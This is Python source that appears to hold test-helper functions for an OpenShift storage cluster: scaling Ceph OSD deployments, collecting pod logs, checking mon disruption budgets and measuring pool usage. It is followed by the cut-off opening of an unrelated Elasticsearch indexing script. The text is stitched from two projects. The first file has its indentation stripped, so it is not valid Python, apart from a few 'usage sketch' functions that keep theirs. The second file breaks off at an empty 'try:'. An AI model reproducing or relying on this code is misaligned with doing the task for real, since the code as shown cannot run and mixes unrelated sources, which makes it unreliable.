logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN["username"]
if not password:
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["password_location"]
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["kubeconfig_location"]
)
file_path = os.path.dirname(filename)
master_list = node.get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = "auth"
check_conf = "kubeconfig"
node_path = "/home/core/"
if check_auth not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}auth"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
def create_dummy_osd(deployment):
"""
Replace one of OSD pods with pod that contains all data from original
    OSD but doesn't run the osd daemon. This can be used e.g. for direct access
to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT, namespace=config.ENV_DATA.get("cluster_namespace")
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name("dummy", "osd")
osd_data["metadata"]["name"] = dummy_deployment
osd_containers = osd_data.get("spec").get("template").get("spec").get("containers")
# get osd container spec
original_osd_args = osd_containers[0].get("args")
osd_data["spec"]["template"]["spec"]["containers"][0]["args"] = []
osd_data["spec"]["template"]["spec"]["containers"][0]["command"] = [
"/bin/bash",
"-c",
"sleep infinity",
]
osd_file = tempfile.NamedTemporaryFile(
mode="w+", prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
dummy_pod = [pod for pod in osd_list if dummy_deployment in pod.name][0]
wait_for_resource_state(
resource=dummy_pod, state=constants.STATUS_RUNNING, timeout=60
)
ceph_init_cmd = "/rook/tini" + " " + " ".join(original_osd_args)
try:
logger.info("Following command should expire after 7 seconds")
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info("Killing /rook/tini process")
try:
dummy_pod.exec_sh_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
def get_failure_domin():
"""
    Function used to get the failure domain of the pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format="json")
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
    In case of node failure scenarios in which the selected node is
running the ceph tools pod, we'll want to wait for the pod recovery
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods,
previous_num=1,
namespace=config.ENV_DATA["cluster_namespace"],
timeout=120,
selector=constants.TOOL_APP_LABEL,
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
node_list (list): List of node name
        label_key (str): Label_key to be added to the worker node
label_value (str): Label_value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}",
out_yaml_format=False,
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
node_list (list): List of node name
        label_key (str): Label_key to be removed from the worker node
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, "w") as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = "-".join(resource_name.split("-")[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
def modify_deployment_replica_count(deployment_name, replica_count):
"""
Function to modify deployment replica count,
i.e to scale up or down deployment
Args:
deployment_name (str): Name of deployment
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=deployment_name, params=params)
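# Illustrative usage sketch: scale a deployment down and back up, e.g. to force a
# respin of the rook-ceph-operator; the deployment name here is an assumption.
def _example_respin_operator_via_scaling():
    modify_deployment_replica_count("rook-ceph-operator", 0)
    modify_deployment_replica_count("rook-ceph-operator", 1)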
def collect_performance_stats(dir_name):
"""
    Collect performance stats and save them to a file in JSON format.
    Args:
        dir_name (str): directory name to store stats
    Performance stats include:
        IOPS and throughput percentage of the cluster
        CPU and memory consumption of each node
"""
from ocs_ci.ocs.cluster import CephCluster
log_dir_path = os.path.join(
os.path.expanduser(config.RUN["log_dir"]),
f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
f"{dir_name}_performance_stats",
)
if not os.path.exists(log_dir_path):
logger.info(f"Creating directory {log_dir_path}")
os.makedirs(log_dir_path)
performance_stats = {}
external = config.DEPLOYMENT["external_mode"]
if external:
# Skip collecting performance_stats for external mode RHCS cluster
logging.info("Skipping status collection for external mode")
else:
ceph_obj = CephCluster()
# Get iops and throughput percentage of cluster
iops_percentage = ceph_obj.get_iops_percentage()
throughput_percentage = ceph_obj.get_throughput_percentage()
performance_stats["iops_percentage"] = iops_percentage
performance_stats["throughput_percentage"] = throughput_percentage
        # ToDo: Get iops and throughput percentage of each node
        # Get the cpu and memory of each node from adm top
master_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="master")
)
worker_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="worker")
)
# Get the cpu and memory from describe of nodes
master_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="master")
)
worker_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="worker")
)
performance_stats["master_node_utilization"] = master_node_utilization_from_adm_top
performance_stats["worker_node_utilization"] = worker_node_utilization_from_adm_top
performance_stats[
"master_node_utilization_from_oc_describe"
] = master_node_utilization_from_oc_describe
performance_stats[
"worker_node_utilization_from_oc_describe"
] = worker_node_utilization_from_oc_describe
file_name = os.path.join(log_dir_path, "performance")
with open(file_name, "w") as outfile:
json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
"""
    Check whether an OOMKilled ('signal: killed') message is present in the pod log
Args:
pod_name (str): Name of the pod
namespace (str): Namespace of the pod
container (str): Name of the container
Returns:
bool : True if oomkill messages are not found on log.
False Otherwise.
Raises:
        AssertionError: If fetching the logs failed
"""
rc = True
try:
pod_log = pod.get_pod_logs(
pod_name=pod_name, namespace=namespace, container=container, previous=True
)
result = pod_log.find("signal: killed")
if result != -1:
rc = False
except CommandFailed as ecf:
assert (
f'previous terminated container "{container}" in pod "{pod_name}" not found'
in str(ecf)
), "Failed to fetch logs"
return rc
def validate_pods_are_running_and_not_restarted(pod_name, pod_restart_count, namespace):
"""
    Validate that the given pod is in Running state and was not restarted or re-spun
Args:
pod_name (str): Name of the pod
pod_restart_count (int): Restart count of pod
namespace (str): Namespace of the pod
Returns:
bool : True if pod is in running state and restart
count matches the previous one
"""
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
pod_obj = ocp_obj.get(resource_name=pod_name)
restart_count = (
pod_obj.get("status").get("containerStatuses")[0].get("restartCount")
)
pod_state = pod_obj.get("status").get("phase")
if pod_state == "Running" and restart_count == pod_restart_count:
logger.info("Pod is running state and restart count matches with previous one")
return True
logger.error(
f"Pod is in {pod_state} state and restart count of pod {restart_count}"
)
logger.info(f"{pod_obj}")
return False
def calc_local_file_md5_sum(path):
"""
Calculate and return the MD5 checksum of a local file
    Args:
        path (str): The path to the file
Returns:
str: The MD5 checksum
"""
with open(path, "rb") as file_to_hash:
file_as_bytes = file_to_hash.read()
return hashlib.md5(file_as_bytes).hexdigest()
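# Illustrative usage sketch: compare a local file's checksum against a value
# computed elsewhere (e.g. on a pod); the path below is an assumption.
def _example_verify_local_checksum(expected_md5):
    return calc_local_file_md5_sum("/tmp/example_object") == expected_md5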
def retrieve_default_ingress_crt():
"""
Copy the default ingress certificate from the router-ca secret
to the local code runner for usage with boto3.
"""
default_ingress_crt_b64 = (
OCP(
kind="secret",
namespace="openshift-ingress-operator",
resource_name="router-ca",
)
.get()
.get("data")
.get("tls.crt")
)
decoded_crt = base64.b64decode(default_ingress_crt_b64).decode("utf-8")
with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, "w") as crtfile:
crtfile.write(decoded_crt)
def storagecluster_independent_check():
"""
Check whether the storagecluster is running in independent mode
by checking the value of spec.externalStorage.enable
Returns:
        bool: True if the storagecluster is running in external mode, False otherwise
"""
storage_cluster = (
OCP(kind="StorageCluster", namespace=config.ENV_DATA["cluster_namespace"])
.get()
.get("items")[0]
)
return bool(
storage_cluster.get("spec", {}).get("externalStorage", {}).get("enable", False)
)
def get_pv_size(storageclass=None):
"""
    Get PV size from the requested storageclass
Args:
storageclass (str): Name of storageclass
Returns:
        list: list of PV sizes
"""
return_list = []
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
for pv_obj in pv_objs:
if pv_obj["spec"]["storageClassName"] == storageclass:
return_list.append(pv_obj["spec"]["capacity"]["storage"])
return return_list
def get_pv_names():
"""
    Get PV names
Returns:
list: list of pv names
"""
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
return [pv_obj["metadata"]["name"] for pv_obj in pv_objs]
def default_volumesnapshotclass(interface_type):
"""
Return default VolumeSnapshotClass based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: VolumeSnapshotClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_RBD
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
)
elif interface_type == constants.CEPHFILESYSTEM:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_CEPHFS
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
)
base_snapshot_class = OCP(
kind=constants.VOLUMESNAPSHOTCLASS, resource_name=resource_name
)
return OCS(**base_snapshot_class.data)
def get_snapshot_content_obj(snap_obj):
"""
Get volume snapshot content of a volume snapshot
Args:
snap_obj (OCS): OCS instance of kind VolumeSnapshot
Returns:
OCS: OCS instance of kind VolumeSnapshotContent
"""
data = dict()
data["api_version"] = snap_obj.api_version
data["kind"] = constants.VOLUMESNAPSHOTCONTENT
snapcontent = snap_obj.ocp.get(resource_name=snap_obj.name, out_yaml_format=True)[
"status"
]["boundVolumeSnapshotContentName"]
data["metadata"] = {"name": snapcontent, "namespace": snap_obj.namespace}
snapcontent_obj = OCS(**data)
snapcontent_obj.reload()
return snapcontent_obj
def wait_for_pv_delete(pv_objs):
"""
    Wait for PVs to be deleted. Delete PVs having ReclaimPolicy 'Retain'.
Args:
pv_objs (list): OCS instances of kind PersistentVolume
"""
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
@retry(UnexpectedBehaviour, tries=20, delay=10, backoff=1)
def fetch_used_size(cbp_name, exp_val=None):
"""
Fetch used size in the pool
Args:
        cbp_name (str): Name of the cephblockpool
        exp_val (float): Expected used size in GB
Returns:
float: Used size in GB
"""
ct_pod = pod.get_ceph_tools_pod()
rados_status = ct_pod.exec_ceph_cmd(ceph_cmd=f"rados df -p {cbp_name}")
size_bytes = rados_status["pools"][0]["size_bytes"]
# Convert size to GB
used_in_gb = float(format(size_bytes / constants.GB, ".4f"))
if exp_val and abs(exp_val - used_in_gb) > 1.5:
raise UnexpectedBehaviour(
f"Actual {used_in_gb} and expected size {exp_val} not "
f"matching. Retrying"
)
return used_in_gb
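# Illustrative usage sketch: poll the default block pool until its used size is
# within 1.5 GB of the expected value; the @retry decorator above makes the call
# retry on UnexpectedBehaviour. The pool constant is reused from this module.
def _example_wait_for_pool_usage(expected_gb):
    return fetch_used_size(constants.DEFAULT_BLOCKPOOL, exp_val=expected_gb)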
def get_full_test_logs_path(cname):
"""
    Get the full path of the log file for a particular test.
    This function uses the inspect module to find the name of the caller function,
    so it needs to be called once from the main test function.
    The output is in the form of
    ocsci_log_path/<full test file path>/<test filename>/<test class name>/<test function name>
Args:
cname (obj): the Class object which was run and called this function
Return:
str : full path of the test logs relative to the ocs-ci base logs path
"""
# the module path relative to ocs-ci base path
log_file_name = (inspect.stack()[1][1]).replace(f"{os.getcwd()}/", "")
# The name of the class
mname = type(cname).__name__
# the full log path (relative to ocs-ci base path)
full_log_path = (
f"{ocsci_log_path()}/{log_file_name}/{mname}/{inspect.stack()[1][3]}"
)
return full_log_path
def get_mon_pdb():
"""
Check for Mon PDB
Returns:
        disruptions_allowed (int): Count of allowed mon disruptions
        min_available_mon (int): Count of minimum mons available
        max_unavailable_mon (int): Count of maximum mons unavailable
"""
pdb_obj = OCP(
kind=constants.POD_DISRUPTION_BUDGET,
resource_name=constants.MON_PDB,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
)
disruptions_allowed = pdb_obj.get().get("status").get("disruptionsAllowed")
min_available_mon = pdb_obj.get().get("spec").get("minAvailable")
max_unavailable_mon = pdb_obj.get().get("spec").get("maxUnavailable")
return disruptions_allowed, min_available_mon, max_unavailable_mon
def verify_pdb_mon(disruptions_allowed, max_unavailable_mon):
"""
Compare between the PDB status and the expected PDB status
Args:
disruptions_allowed (int): the expected number of disruptions_allowed
max_unavailable_mon (int): the expected number of max_unavailable_mon
return:
bool: True if the expected pdb state equal to actual pdb state, False otherwise
"""
logging.info("Check mon pdb status")
mon_pdb = get_mon_pdb()
result = True
if disruptions_allowed != mon_pdb[0]:
result = False
logger.error(
f"The expected disruptions_allowed is: {disruptions_allowed}.The actual one is {mon_pdb[0]}"
)
if max_unavailable_mon != mon_pdb[2]:
result = False
logger.error(
f"The expected max_unavailable_mon is {max_unavailable_mon}.The actual one is {mon_pdb[2]}"
)
return result
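# Illustrative usage sketch: assert the mon PodDisruptionBudget allows one
# disruption and one unavailable mon (typical expectation for a healthy 3-mon
# cluster; the expected values are assumptions).
def _example_check_mon_pdb():
    assert verify_pdb_mon(disruptions_allowed=1, max_unavailable_mon=1)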
@retry(CommandFailed, tries=10, delay=30, backoff=1)
def run_cmd_verify_cli_output(
cmd=None, expected_output_lst=(), cephtool_cmd=False, debug_node=None
):
"""
Run command and verify its output
Args:
cmd(str): cli command
expected_output_lst(set): A set of strings that need to be included in the command output.
cephtool_cmd(bool): command on ceph-tool pod
debug_node(str): name of node
Returns:
        bool: True if all strings are included in the command output, False otherwise
"""
if cephtool_cmd is True:
tool_pod = pod.get_ceph_tools_pod()
cmd_start = f"oc rsh -n openshift-storage {tool_pod.name} "
cmd = f"{cmd_start} {cmd}"
elif debug_node is not None:
cmd_start = f"oc debug nodes/{debug_node} -- chroot /host /bin/bash -c "
cmd = f'{cmd_start} "{cmd}"'
out = run_cmd(cmd=cmd)
logger.info(out)
for expected_output in expected_output_lst:
if expected_output not in out:
return False
return True
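# Illustrative usage sketch: verify through the ceph-tools pod that the cluster
# reports HEALTH_OK; the expected string is an assumption about the desired state.
def _example_check_ceph_health_ok():
    return run_cmd_verify_cli_output(
        cmd="ceph health",
        expected_output_lst={"HEALTH_OK"},
        cephtool_cmd=True,
    )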
def check_rbd_image_used_size(
pvc_objs, usage_to_compare, rbd_pool=constants.DEFAULT_BLOCKPOOL, expect_match=True
):
"""
Check if RBD image used size of the PVCs are matching with the given value
Args:
pvc_objs (list): List of PVC objects
usage_to_compare (str): Value of image used size to be compared with actual value. eg: "5GiB"
rbd_pool (str): Name of the pool
expect_match (bool): True to verify the used size is equal to 'usage_to_compare' value.
False to verify the used size is not equal to 'usage_to_compare' value.
Returns:
bool: True if the verification is success for all the PVCs, False otherwise
"""
ct_pod = pod.get_ceph_tools_pod()
no_match_list = []
for pvc_obj in pvc_objs:
rbd_image_name = pvc_obj.get_rbd_image_name
du_out = ct_pod.exec_ceph_cmd(
ceph_cmd=f"rbd du -p {rbd_pool} {rbd_image_name}",
format="",
)
used_size = "".join(du_out.strip().split()[-2:])
if expect_match:
if usage_to_compare != used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation."
f" Expected used size: {usage_to_compare}. Actual used size: {used_size}. "
f"Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
else:
if usage_to_compare == used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation. "
f"Expected the used size to be diferent than {usage_to_compare}. "
f"Actual used size: {used_size}. Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
if no_match_list:
logger.error(
f"RBD image used size of these PVCs did not meet the expectation - {no_match_list}"
)
return False
return True
def set_configmap_log_level_rook_ceph_operator(value):
"""
Set ROOK_LOG_LEVEL on configmap of rook-ceph-operator
Args:
value (str): type of log
"""
path = "/data/ROOK_LOG_LEVEL"
params = f"""[{{"op": "add", "path": "{path}", "value": "{value}"}}]"""
configmap_obj = OCP(
kind=constants.CONFIGMAP,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
resource_name=constants.ROOK_OPERATOR_CONFIGMAP,
)
logger.info(f"Setting ROOK_LOG_LEVEL to: {value}")
configmap_obj.patch(params=params, format_type="json")
def get_logs_rook_ceph_operator():
"""
Get logs from a rook_ceph_operator pod
Returns:
        str: Logs of the rook-ceph-operator pod
"""
logger.info("Get logs from rook_ceph_operator pod")
rook_ceph_operator_objs = pod.get_operator_pods()
return pod.get_pod_logs(pod_name=rook_ceph_operator_objs[0].name)
def check_osd_log_exist_on_rook_ceph_operator_pod(
last_log_date_time_obj, expected_strings=(), unexpected_strings=()
):
"""
Verify logs contain the expected strings and the logs do not
contain the unexpected strings
Args:
        last_log_date_time_obj (datetime obj): datetime of the last operator log line before the check
expected_strings (list): verify the logs contain the expected strings
unexpected_strings (list): verify the logs do not contain the strings
Returns:
bool: True if logs contain the expected strings and the logs do not
contain the unexpected strings, False otherwise
"""
logger.info("Respin OSD pod")
osd_pod_objs = pod.get_osd_pods()
osd_pod_obj = random.choice(osd_pod_objs)
osd_pod_obj.delete()
new_logs = list()
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj and log_date_time_obj > last_log_date_time_obj:
new_logs.append(line)
res_expected = False
res_unexpected = True
for new_log in new_logs:
if all(
expected_string.lower() in new_log.lower()
for expected_string in expected_strings
):
res_expected = True
logger.info(f"{new_log} contain expected strings {expected_strings}")
break
for new_log in new_logs:
if any(
unexpected_string.lower() in new_log.lower()
for unexpected_string in unexpected_strings
):
logger.error(f"{new_log} contain unexpected strings {unexpected_strings}")
res_unexpected = False
break
return res_expected & res_unexpected
def get_last_log_time_date():
"""
Get last log time
Returns:
        last_log_date_time_obj (datetime obj): datetime of the last line in the rook-ceph-operator logs
"""
logger.info("Get last log time")
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj:
last_log_date_time_obj = log_date_time_obj
return last_log_date_time_obj
def clear_crash_warning_and_osd_removal_leftovers():
"""
    Clear crash warnings and osd removal leftovers. This function can be used,
    for example, after the device replacement test or the node replacement test.
"""
is_deleted = pod.delete_all_osd_removal_jobs()
if is_deleted:
logger.info("Successfully deleted all the ocs-osd-removal jobs")
is_osd_pods_running = pod.wait_for_pods_to_be_running(
pod_names=[osd_pod.name for osd_pod in pod.get_osd_pods()], timeout=120
)
if not is_osd_pods_running:
logger.warning("There are still osds down. Can't clear ceph crash warnings")
return
is_daemon_recently_crash_warnings = run_cmd_verify_cli_output(
cmd="ceph health detail",
expected_output_lst={"HEALTH_WARN", "daemons have recently crashed"},
cephtool_cmd=True,
)
if is_daemon_recently_crash_warnings:
logger.info("Clear all ceph crash warnings")
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd(ceph_cmd="ceph crash archive-all")
else:
logger.info("There are no daemon crash warnings")
def get_noobaa_url():
"""
Get the URL of noobaa console
Returns:
str: url of noobaa console
"""
ocp_obj = OCP(kind=constants.ROUTE, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
route_obj = ocp_obj.get(resource_name="noobaa-mgmt")
return route_obj["spec"]["host"]
def select_unique_pvcs(pvcs):
"""
Get the PVCs with unique access mode and volume mode combination.
Args:
pvcs(list): List of PVC objects
Returns:
list: List of selected PVC objects
"""
pvc_dict = {}
for pvc_obj in pvcs:
pvc_data = pvc_obj.get()
access_mode_volume_mode = (
pvc_data["spec"]["accessModes"][0],
pvc_data["spec"].get("volumeMode"),
)
pvc_dict[access_mode_volume_mode] = pvc_dict.get(
access_mode_volume_mode, pvc_obj
)
return pvc_dict.values()
def mon_pods_running_on_same_node():
"""
    Verifies that no two mons are running on the same node; raises UnexpectedBehaviour otherwise
"""
mon_running_nodes = node.get_mon_running_nodes()
if len(mon_running_nodes) != len(set(mon_running_nodes)):
logger.error(f"Mons running on nodes: {mon_running_nodes}")
raise UnexpectedBehaviour("Two or more mons running on same node")
logger.info("Mons are running on different nodes")
def get_failure_domain():
"""
Get Failure Domain
Returns:
string: type of failure domain
"""
from ocs_ci.ocs.resources.storage_cluster import get_storage_cluster
storage_cluster_obj = get_storage_cluster()
return storage_cluster_obj.data["items"][0]["status"]["failureDomain"]
def modify_statefulset_replica_count(statefulset_name, replica_count):
"""
Function to modify statefulset replica count,
i.e to scale up or down statefulset
Args:
        statefulset_name (str): Name of statefulset
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = OCP(kind=constants.STATEFULSET, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=statefulset_name, params=params)
def get_event_line_datetime(event_line):
"""
Get the event line datetime
Args:
event_line (str): The event line to get it's datetime
Returns:
datetime object: The event line datetime
"""
if re.search(r"\d{4}-\d{2}-\d{2}", event_line):
return datetime.datetime.strptime(event_line[:26], "%Y-%m-%d %H:%M:%S.%f")
else:
return None
def get_rook_ceph_pod_events(pod_name):
"""
Get the rook ceph pod events from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
Returns:
list: List of all the event lines with the specific pod
"""
rook_ceph_operator_event_lines = get_logs_rook_ceph_operator().splitlines()
return [line for line in rook_ceph_operator_event_lines if pod_name in line]
def get_rook_ceph_pod_events_by_keyword(pod_name, keyword):
"""
Get the rook ceph pod events with the keyword 'keyword' from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
keyword (str): The keyword to search in the events
Returns:
list: List of all the event lines with the specific pod that has the keyword 'keyword'
"""
pod_event_lines = get_rook_ceph_pod_events(pod_name)
return [
event_line
for event_line in pod_event_lines
if keyword.lower() in event_line.lower()
]
def wait_for_rook_ceph_pod_status(pod_obj, desired_status, timeout=420):
"""
Wait for the rook ceph pod to reach the desired status. If the pod didn't reach the
desired status, check if the reason is that the pod is not found. If this is the case,
check in the rook ceph pod operator logs to see if the pod reached the desired status.
Args:
pod_obj (ocs_ci.ocs.resources.pod.Pod): The rook ceph pod object
desired_status (str): The desired status of the pod to wait for
timeout (int): time to wait for the pod to reach the desired status
Returns:
        bool: True if the rook ceph pod reached the desired status, False otherwise
"""
start_log_datetime = get_last_log_time_date()
try:
wait_for_resource_state(pod_obj, desired_status, timeout=timeout)
except (ResourceWrongStatusException, CommandFailed) as e:
if "not found" in str(e):
logger.info(
f"Failed to find the pod {pod_obj.name}. Trying to search for the event "
f"in rook ceph operator logs..."
)
pod_event_lines_with_desired_status = get_rook_ceph_pod_events_by_keyword(
pod_obj.name, keyword=desired_status
)
last_pod_event_line = pod_event_lines_with_desired_status[-1]
last_pod_event_datetime = get_event_line_datetime(last_pod_event_line)
if last_pod_event_datetime > start_log_datetime:
logger.info(
f"Found the event of pod {pod_obj.name} with status {desired_status} in "
f"rook ceph operator logs. The event line is: {last_pod_event_line}"
)
return True
else:
return False
else:
logger.info(f"An error has occurred when trying to get the pod object: {e}")
return False
return True
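# Illustrative usage sketch: wait for a given OSD pod to reach Running state,
# falling back to the operator logs if the pod object disappears first.
def _example_wait_for_osd_running(osd_pod_obj):
    return wait_for_rook_ceph_pod_status(
        osd_pod_obj, constants.STATUS_RUNNING, timeout=300
    )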
def check_number_of_mon_pods(expected_mon_num=3):
"""
    Function to check the number of mon pods
    Args:
        expected_mon_num (int): Expected number of mon pods
    Returns:
        bool: True if the number of mon pods equals expected_mon_num, False otherwise
"""
mon_pod_list = pod.get_mon_pods()
if len(mon_pod_list) == expected_mon_num:
logger.info(f"Number of mons equal to {expected_mon_num}")
return True
logger.error(f"Number of Mons not equal to {expected_mon_num} {mon_pod_list}")
return False
|
index_es_7.py
|
from src.models import DBSession, Base, Colleague, ColleagueLocus, Dbentity, Locusdbentity, Filedbentity, FileKeyword, LocusAlias, Dnasequenceannotation, So, Locussummary, Phenotypeannotation, PhenotypeannotationCond, Phenotype, Goannotation, Go, Goslimannotation, Goslim, Apo, Straindbentity, Strainsummary, Reservedname, GoAlias, Goannotation, Referencedbentity, Referencedocument, Referenceauthor, ReferenceAlias, Chebi, Disease, Diseaseannotation, DiseaseAlias, Complexdbentity, ComplexAlias, ComplexReference, Complexbindingannotation, Tools, Alleledbentity, AlleleAlias
from sqlalchemy import create_engine, and_
from elasticsearch import Elasticsearch
# from mapping import mapping
from es7_mapping import mapping
import os
import requests
from threading import Thread
import json
import collections
from index_es_helpers import IndexESHelper
import concurrent.futures
import uuid
import logging
engine = create_engine(os.environ["NEX2_URI"], pool_recycle=3600)
DBSession.configure(bind=engine)
Base.metadata.bind = engine
INDEX_NAME = os.environ.get("ES_INDEX_NAME", "searchable_items_aws")
DOC_TYPE = "searchable_item"
ES_URI = os.environ["WRITE_ES_URI"]
es = Elasticsearch(ES_URI, retry_on_timeout=True)
def delete_mapping():
print("Deleting mapping...")
response = requests.delete(ES_URI + INDEX_NAME + "/")
if response.status_code != 200:
print(("ERROR: " + str(response.json())))
else:
print("SUCCESS")
def put_mapping():
print("Putting mapping... ")
try:
